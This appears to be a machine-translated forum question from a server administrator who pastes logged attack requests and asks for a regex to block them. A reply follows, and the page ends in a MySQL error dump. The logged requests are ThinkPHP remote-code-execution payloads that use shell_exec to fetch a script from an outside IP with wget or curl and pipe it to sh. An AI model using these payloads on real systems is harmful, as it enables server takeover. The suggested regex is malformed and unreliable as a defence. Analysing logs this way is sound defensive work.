Security: the server has been attacked recently. Please help me write a rule.

for example, the server has been attacked recently. Check and find that there are many such requests. I am not good. Ask all kinds of gods to help write regular expressions to match

.
11:
/index.php?s=/Index/\x5Cthink\x5Capp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]=wget%20-q%20-O%20-%2082.146.58.234/p2.sh|sh

22:
/index.php?s=/Index/\x5Cthink\x5Capp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]=curl%2082.146.58.234/p2.sh|sh

33:
\x03\x00\x00/*\xE0\x00\x00\x00\x00\x00Cookie: mstshash=Administr


I thank you here. Also by the way, greetings to the family members of Wuxi, Jiangsu, whose IP address is 27.203.3.136 and now IP address is 180.97.172.9, on January 6, 2019 in Weihai, Shandong Province.

mainly matches the above connection as long as it contains the words function or exec. The two keywords are the relationship between or (| |), not with (& &).


No one wrote it. Forget it. I'll write it myself. Finish the problem.
in fact, the above attacks are mainly aimed at the remote code execution vulnerability of thinkphp. There are at least four ways to deal with it.
regular expression:

\[function|exec|sh]$

the rest of the cookie is useless, so it doesn't match.


I have also analyzed a lot of such requests. I don't understand what it is. Thank you for explaining

MySQL Query : SELECT * FROM `codeshelper`.`v9_news` WHERE status=99 AND catid='6' ORDER BY rand() LIMIT 5
MySQL Error : Disk full (/tmp/#sql-temptable-64f5-7bb606-8e23.MAI); waiting for someone to free some space... (errno: 28 "No space left on device")
MySQL Errno : 1021
Message : Disk full (/tmp/#sql-temptable-64f5-7bb606-8e23.MAI); waiting for someone to free some space... (errno: 28 "No space left on device")
Need Help?